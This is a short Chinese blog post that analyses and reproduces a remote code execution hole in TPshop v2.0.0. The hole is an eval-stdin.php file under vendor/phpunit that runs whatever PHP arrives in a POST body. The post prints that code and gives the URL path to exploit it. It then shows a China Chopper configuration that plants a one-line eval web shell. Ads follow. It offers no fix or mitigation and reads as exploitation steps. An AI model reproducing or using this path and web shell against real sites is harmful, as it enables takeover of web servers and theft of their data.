TPshop商城 Getshell后门文件分析与复现

技术 作者:i春秋 2017-11-14 07:14:22
本文作者:i春秋签约作家——Laimooc
官网地址:http://www.tp-shop.cn/ 影响版本:TPSHOP v2.0.0 后门文件:eval-stdin.php 内容:
<?php  eval('?>' . file_get_contents('php://input')); ?>
分析: 使用
file_get_contents('php://input'))
接收POST请求的原始数据流 eval函数来执行。 我们把代码复制下来,本地调试如下,惊喜不,喜欢不,兴奋不: 利用方法: 访问后门文件 url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,post请求发送数据即可实现getshell。 那么问题来了,既然可以执行php代码,那么我们就直接配置菜刀连接. 采用写入的话就有点麻烦了。 地址: http:xss.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 配置:
<O>
<?php eval($_POST[c]);?>
</O>

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接